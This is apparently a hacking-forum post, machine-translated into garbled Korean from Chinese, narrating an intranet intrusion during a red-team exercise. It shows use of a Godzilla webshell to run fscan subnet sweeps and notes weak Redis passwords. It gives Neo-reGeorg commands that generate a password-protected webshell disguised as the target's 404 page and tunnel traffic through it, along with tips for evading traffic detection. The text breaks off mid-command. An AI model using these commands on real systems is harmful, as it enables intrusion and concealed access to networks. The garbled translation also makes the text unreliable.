KoreanHackerTeam
Moderator
0x00前言
E-Sports (Area College League)에 대한 나의 꿈을 깨닫고 바빴지만 어느 날 오후 마스터가 갑자기 나에게 연락하여 인터뷰없이 지방 보호 팀을 플레이하기 위해 그룹에 가입 할 수 있다고 말했습니다. 어떻게 그렇게 좋은 실용적인 기회를 놓칠 수 있습니까? (재미있는 게임, 나에게서 배우지 마십시오 ^^)0x01 一个出局的企业单位内网之旅
打点一
이야기의 시작은 남자가 나를 위해 시스템을 잃었다는 것입니다.
Ipconfig는 10 개의 인트라넷이 있으며, 이런 종류의 인트라넷은 일반적으로 큽니다.
그러나 이런 종류의 ND는 다른 사람들에 의해 휩쓸려 왔습니다. 디렉토리는 말로 가득합니다
뭔가 잘못되었다는 것을 알았습니다. 알 수없는 해커는 어제 FSCAN을 소문했다
그러나 대상 장치는 아직 제거되지 않았습니다. 먼저 플레이합시다.
온라인으로 갈 준비를하지만 찾을 수 없습니다
먼저 Godzilla에서 FCSAN 명령을 통과하고 B 섹션을 스캔하십시오.
(먼저 Noping 및 sweep 섹션 C를 조금씩 스윕 한 다음 기계를 사용하여 후면 경로를 떠나야합니다. 이번에는 문제가 있습니다. 그렇지 않으면 트래픽 감지 장비가이를 감지 한 다음 스테이션을 닫고 직접 보내십시오).
약한 비밀번호의 무리가 redis
Neo-reGeorg使用
Neo-Regeorg 전방 터널링 도구를 프록시 트래픽으로 사용하십시오.Neo-Regeorg는 업그레이드 된 REGEORG 버전 인 일반적인 HTTP 전방 터널링 도구로 컨텐츠 암호화, 요청 헤더 사용자 정의, 응답 코드 사용자 정의 등과 같은 일부 기능을 추가합니다.
python3 neoreg.py 생성 -K xxx -파일 404.html --httpcode 404
웹 쉘 비밀번호를 xxx로 생성하십시오
더 흥미로운 점은 도구에 의해 추가 된 404 템플릿 함수, 실제 사본의 대상 사이트의 404HTML 및 도구 후에 생성 된 웹 쉘은 웹 쉘에 직접 액세스 할 수있게되므로 파일 숨기기에 매우 도움이된다는 것입니다.
대상 사이트에 업로드하십시오
python3 neoreg.py -k xxx -uhttp://